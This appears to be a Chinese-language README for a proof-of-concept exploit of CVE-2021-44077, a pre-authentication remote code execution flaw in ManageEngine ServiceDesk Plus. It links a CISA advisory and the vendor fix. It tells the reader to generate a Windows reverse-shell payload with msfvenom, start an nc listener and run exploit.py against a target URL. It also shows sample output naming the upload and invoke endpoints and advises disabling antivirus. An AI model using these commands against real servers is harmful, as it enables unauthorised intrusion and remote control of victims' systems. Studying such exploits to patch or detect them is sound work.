CVE-2021-44077 的概念利用证明:ManageEngine ServiceDesk Plus < 11306 中的 PreAuth RCE
基于:
- https://xz.aliyun.com/t/10631
CISA咨询:
- https://www.cisa.gov/uscert/ncas/alerts/aa21-336a
修复(更新到 build 11306 或更高版本):
- https://www.manageengine.com/products/service-desk/security-response-plan.html
在 ManageEngine ServiceDesk Plus Build 11303 上测试。禁用所有 AV。
用法
该漏洞利用将 Windows 可执行文件上传到目标并执行它。
要利用,首先生成任何可执行文件。例如:
代码语言:javascript复制msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.140 LPORT=4444 -f exe > msiexec.exepip install要求文件或确保你有requests包。
如果您试图捕获反向 shell,请先运行您的侦听器,例如
代码语言:javascript复制nc -l 4444然后运行漏洞利用脚本,传入url和exe参数,例如
python exploit.py http://<TARGET>:<PORT> <path_to_exe>示例脚本输出:
% python exploit.py http://192.168.0.140:8080 msiexec.exe
[ ] Target: http://192.168.0.140:8080/
[ ] Executable: msiexec.exe
[ ] Uploading msiexec.exe to http://192.168.0.140:8080/RestAPI/ImportTechnicians?step=1
[ ] Got 401 error code on upload. This is expected.
[ ] Uploaded msiexec.exe
[ ] Attempting to invoke against url http://192.168.0.140:8080/./RestAPI/s247action. Waiting up to 20 seconds...
[ ] Done, did it work?
